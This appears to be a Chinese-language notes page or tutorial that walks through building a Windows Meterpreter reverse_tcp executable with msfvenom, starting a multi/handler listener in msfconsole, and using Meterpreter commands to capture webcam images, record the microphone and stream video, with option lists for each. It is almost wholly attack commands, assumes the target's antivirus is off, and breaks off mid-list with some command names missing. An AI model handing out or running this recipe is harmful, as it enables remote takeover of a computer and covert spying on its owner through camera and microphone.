條件:兩台試驗機在同一網段,目標機關閉殺毒軟件
步驟:msfvenom -p windows/meterpreter/reverse_tcp lhost=xxx lport=xxx -f exe -o /root/xxx.exe
lhost=xxx --主機ip
lport=xxx --監聽端口(自定義)
-f exe --文件格式為exe格式
-o /root/payload.exe
msfconsole --啟動主控端
use exploit /multi/handler --使用handler作為主動端
set payload windows/meterpreter/reverse_tcp --設置payload為反向遠程控制程序名稱
set lhost --設置監聽ip
set lport --設置監聽端口
exploit
-h:顯示幫助。
-i :要使用的網絡攝像頭的索引號。
-p :JPEG圖像文件路徑。默認為HOME / [隨機亂碼名字] .jpeg
-q:JPEG圖像質量,默認為“50”
-v:自動查看JPEG圖像,默認為“true”
record_mic --錄音
-h:顯示幫助。
-d :記錄的秒數,默認為1秒
-F :wav文件路徑。默認為HOME / [隨機亂碼名字] .wav
-p :自動播放捕獲的音頻,默認為“true”
run webcam --錄像
-h:顯示幫助橫幅。
-d :循環延遲間隔(以毫秒為單位),默認為1000
-f:只抓一幀
-g:發送到GUI而不是寫入文件
-i :默認情況下使用的網絡攝像頭的索引1
-l:默認情況下保持循環捕獲(無用)
-p :默認情況下,文件夾映像的路徑將保存在當前工作目錄中
-q